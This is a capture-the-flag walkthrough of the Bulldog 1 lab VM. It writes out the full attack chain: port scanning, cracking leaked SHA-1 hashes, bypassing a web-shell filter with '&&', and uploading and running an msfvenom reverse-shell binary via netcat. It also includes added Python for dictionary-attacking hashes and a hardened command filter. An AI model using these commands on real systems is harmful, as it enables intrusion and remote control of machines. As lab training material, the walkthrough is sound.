Bulldog 1: CTF walkthrough


Name: Bulldog 1

Date of Release: 28 Aug 2017

Author: Nick Frichette

Series: Bulldog

Note: this VM doesn't work with VMware Workstation/Fusion, which is why, after a few tries, I decided to install VirtualBox (ew, disgusting).


First of all, we need to find the IP address of the VM; netdiscover or arp-scan will do the job.


Now we can scan the target to find out which services are running inside this virtual machine.

For that, I use the well-known network scanner nmap.

[email protected]:~/Desktop# nmap -T5 -A -O --reason -p-
Starting Nmap 7.60 ( https://nmap.org ) at 2017-10-08 15:14 CEST

Warning: giving up on port because retransmission cap hit (2).
Nmap scan report for pc-240.home (
Host is up, received arp-response (0.00061s latency).
Not shown: 65185 closed ports, 347 filtered ports
Reason: 65185 resets and 347 no-responses
23/tcp   open  ssh     syn-ack ttl 64 OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 20:8b:fc:9e:d9:2e:28:22:6b:2e:0e:e3:72:c5:bb:52 (RSA)
|_  256 cd:bd:45:d8:5c:e4:8c:b6:91:e5:39:a9:66:cb:d7:98 (ECDSA)
80/tcp   open  http    syn-ack ttl 64 WSGIServer 0.1 (Python 2.7.12)
|_http-server-header: WSGIServer/0.1 Python/2.7.12
|_http-title: Bulldog Industries
8080/tcp open  http    syn-ack ttl 64 WSGIServer 0.1 (Python 2.7.12)
|_http-server-header: WSGIServer/0.1 Python/2.7.12
|_http-title: Bulldog Industries
MAC Address: 08:00:27:16:1D:5F (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

1   0.61 ms pc-240.home (

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 253.84 seconds
[email protected]:~/Desktop#

Two interesting services are running: a Python HTTP server (WSGIServer), possibly serving a Django web application, and an SSH service (OpenSSH 7.2p2), which is listening on port 23 rather than the usual 22.

Now we will focus our research on the website.

Website Analysis

The index of the website doesn't give us any useful information, except the name of one employee. I decided to actively enumerate the target with gobuster, a tool that brute-forces URLs.


The /admin/ and /dev/ directories sound interesting.

The admin directory is a login form; after some research I didn't find any vulnerabilities in it, so I moved on to the second directory.

In the index of the second directory we find an explanation of the project, how the new team is structured, and a web shell, which is inconveniently usable only by logged-in users. At this point I knew I had to find credentials to log in to the admin panel and then use the web shell. After a few tries without success, I knew I had missed something. Yep, I missed something called the source code.

The index of the /dev/ directory contains more than expected: SHA-1 password hashes.

source code

I managed to find the plaintext of two passwords:

Hash (SHA-1)                               Plaintext
ddf45997a7e18a25ad5f5cf222da64814dd060d5   bulldog
d8b8dd5e7f000b8dea26ef8428caf38c04466b3e   bulldoglover
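As an added example (not part of the original walkthrough), here is what makes the leak above so cheap to exploit and what the site should have stored instead: a parser that pulls 40-hex-digit tokens out of a page source, a dictionary check against unsalted SHA-1, and a salted PBKDF2 scheme for comparison. The HTML and the wordlist are constructed for this example; only the two digests come from the page.

```python
import hashlib
import hmac
import os
import re

# Constructed stand-in for the /dev/ page source: developer comments that leak
# unsalted SHA-1 password hashes. The two digests are the ones on the page;
# the surrounding HTML is made up for this example.
DEV_PAGE_SOURCE = """<html><body>
<!-- Need these for the part of the site that requires logins:
     Database user 1 // ddf45997a7e18a25ad5f5cf222da64814dd060d5
     Database user 2 // d8b8dd5e7f000b8dea26ef8428caf38c04466b3e -->
</body></html>"""

# Constructed mini wordlist; a real dictionary attack would use a large list.
WORDLIST = ["password", "industries", "bulldog", "admin", "bulldoglover", "bulldog1"]

SHA1_HEX = re.compile(r"\b[0-9a-fA-F]{40}\b")

def extract_sha1_hashes(html):
    """Return the distinct 40-hex-digit tokens leaked in the page source, in order."""
    found = []
    for digest in SHA1_HEX.findall(html):
        digest = digest.lower()
        if digest not in found:
            found.append(digest)
    return found

def dictionary_attack(hashes, wordlist):
    """Map each unsalted SHA-1 digest to the wordlist entry that produces it.
    With no salt and a fast hash, one pass over the wordlist covers every digest."""
    lookup = {hashlib.sha1(w.encode()).hexdigest(): w for w in wordlist}
    return {h: lookup[h] for h in hashes if h in lookup}

def hash_for_storage(password, iterations=200_000):
    """What the site should have stored instead: salted PBKDF2-HMAC-SHA256.
    Format 'pbkdf2_sha256$iterations$salt_hex$digest_hex' is our own layout."""
    salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"

def verify_stored(password, stored):
    """Recompute the PBKDF2 digest with the stored salt and compare in constant time."""
    _algo, iterations, salt_hex, dk_hex = stored.split("$")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(),
                             bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(dk.hex(), dk_hex)
```

Because every PBKDF2 output carries its own random salt, two stores of the same password differ and a single precomputed wordlist pass no longer cracks every user at once.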

We log into the admin panel with one of these passwords, and then we are able to use the web shell.

web shell

Bypassing Command Restriction

At first glance we can only use six commands: ifconfig, ls, echo, pwd, cat and rm. Moreover, we can't use a semicolon.

We can't use a semicolon, but maybe an ampersand will work. And yes, it works, and it allows us to execute any command we want on the target server.

command filter
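To show why the semicolon check above is not a real restriction, here is an added example (my reconstruction, not the Bulldog application's code) of a filter in the same style next to a hardened one that tokenises the input, rejects every shell metacharacter and never hands the line to a shell at all. The allow-list is the six commands from the page; everything else is assumed.

```python
import shlex
import subprocess

# The six commands the page says the web shell exposes. Note that even a
# correct filter leaves 'cat' and 'rm' able to read or delete any file the
# web server user can reach, so the allow-list itself is part of the risk.
ALLOWED = {"ifconfig", "ls", "echo", "pwd", "cat", "rm"}

def weak_filter_accepts(cmd):
    """Model of the check described on the page: reject ';', require the first
    word to be allow-listed, then pass the whole line to a shell. '&&', '||',
    '|' and '$(...)' are never inspected and all slip through."""
    if ";" in cmd:
        return False
    first_word = cmd.strip().split(" ", 1)[0]
    return first_word in ALLOWED

# Characters that only a shell gives meaning to; none belong in an argument here.
SHELL_META = set("&|;$`<>(){}\\\n")

def strict_argv(cmd):
    """Hardened version: split the line like a shell would, require argv[0] to
    be allow-listed, reject any token carrying shell metacharacters, and return
    an argv list for subprocess without shell=True, so even a stray '&&' would
    be an ordinary argument rather than an operator. None means rejected."""
    try:
        argv = shlex.split(cmd)
    except ValueError:          # unbalanced quotes
        return None
    if not argv or argv[0] not in ALLOWED:
        return None
    if any(SHELL_META & set(tok) for tok in argv):
        return None
    return argv

def run_allowed(cmd, timeout=5):
    """Execute an accepted command with argv semantics; returns stdout or None."""
    argv = strict_argv(cmd)
    if argv is None:
        return None
    proc = subprocess.run(argv, capture_output=True, text=True, timeout=timeout)
    return proc.stdout
```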

We can remotely execute arbitrary code; it's just a matter of seconds before we get a reverse shell.

We generate a malicious ELF file with msfvenom:

[email protected]:~/Desktop# msfvenom --platform linux -p linux/x86/shell_reverse_tcp LPORT=1337 LHOST= -f elf -o rshell
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 68 bytes
Final size of elf file: 152 bytes
Saved as: rshell

We send the malicious file to the target server:

#Web shell
ls && nc -lp 1337 > /tmp/rshell

[email protected]:~/Desktop# nc -nvv 192.168.1.41 1337 < rshell

send shell

We change the permissions of the file:

#Web shell
ls && chmod 777 /tmp/rshell

Finally, we execute the reverse shell and then spawn a pseudo-TTY:

[email protected]:~/Desktop# nc -lnvvp 1337

#Web shell
ls && /tmp/rshell

reverse shell

Privilege Escalation

We have a low-privilege shell; now our job is to find a way to gain root access on this server. After a few minutes I found a hidden directory inside the bulldogadmin home folder:

[email protected]:/home/$ cd bulldogadmin/.hiddenadmindirectory

In this directory we have two things: an ASCII text file and an x64 ELF binary:

[email protected]:/home/bulldogadmin/.hiddenadmindirectory$ file customPermissionApp
customPermissionApp: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=c9f2333253302d74eff3da59653f82d28f9eb36f, not stripped
[email protected]:/home/bulldogadmin/.hiddenadmindirectory$ file note
note: ASCII text, with very long lines
[email protected]:/home/bulldogadmin/.hiddenadmindirectory$

The first thing I try with this ELF file is to search for any strings I can find inside the compiled binary, and fortunately for us, this ELF file contains a password:

[email protected]:/home/bulldogadmin/.hiddenadmindirectory$ strings customPermissionApp
[email protected]:/home/bulldogadmin/.hiddenadmindirectory$

The password is: SUPERultimatePASSWORDyouCANTget